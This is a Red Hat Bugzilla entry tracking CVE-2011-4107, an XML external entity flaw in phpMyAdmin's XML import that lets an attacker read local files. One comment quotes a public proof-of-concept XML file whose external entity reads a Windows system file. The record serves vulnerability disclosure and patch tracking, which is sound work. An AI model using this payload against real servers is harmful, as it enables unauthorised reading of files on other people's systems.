Bug 751112 (CVE-2011-4107) - CVE-2011-4107 phpMyAdmin: Arbitrary file read flaw by loading XML strings
Summary: CVE-2011-4107 phpMyAdmin: Arbitrary file read flaw by loading XML strings
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2011-4107
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
low
low
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2011-11-03 14:57 UTC by Jan Lieskovsky
Modified: 2019-09-29 12:48 UTC (History)
2 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2014-07-19 15:44:11 UTC
Embargoed:


Attachments (Terms of Use)

Description Jan Lieskovsky 2011-11-03 14:57:10 UTC
A local file inclusion flaw was found in the way XML import plug-in of phpMyAdmin, a tool written in PHP intended to handle the administration of MySQL over the World Wide Web, performed import of malformed XML files. A remote attacker could provide a specially-crafted XML file, which once imported into the phpMyAdmin service instance would lead to arbitrary local file (accessible with the privileges of the phpMyAdmin user) read / retrieval.

References:
[1] http://seclists.org/fulldisclosure/2011/Nov/21
[2] http://www.wooyun.org/bugs/wooyun-2010-03185

Comment 1 Jan Lieskovsky 2011-11-03 15:12:41 UTC
CVE request:
[3] http://www.openwall.com/lists/oss-security/2011/11/03/3

Comment 2 Jan Lieskovsky 2011-11-03 15:14:21 UTC
Public PoC from [1] (for Microsoft Windows OS though):
======================================================

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE wooyun [

  <!ENTITY hi80sec SYSTEM "file:///c:/windows/win.ini">

]>



<pma_xml_export version="1.0" xmlns:pma="
http://www.phpmyadmin.net/some_doc_url/";>

    <!--

    - Structure schemas

    -->

    <pma:structure_schemas>

        <pma:database name="test" collation="utf8_general_ci"
charset="utf8">

            <pma:table name="ts_ad">

                &hi80sec;

            </pma:table>

        </pma:database>

    </pma:structure_schemas>



    <!--

    - 数据库: 'thinksns'

    -->

    <database name="thinksns">

        <!-- 表 ts_ad -->

    </database>

</pma_xml_export>

Comment 3 Jan Lieskovsky 2011-11-03 15:15:23 UTC
Regarding upstream patches (not sure phpMyAdmin upstream provided a changeset for this issue already, since it was reported two days ago). Cc-ed them on the CVE request for further patch information.

Comment 4 Vincent Danen 2011-11-04 04:31:49 UTC
This has been assigned the name CVE-2011-4107:

http://www.openwall.com/lists/oss-security/2011/11/03/5


Note You need to log in before you can comment on or make changes to this bug.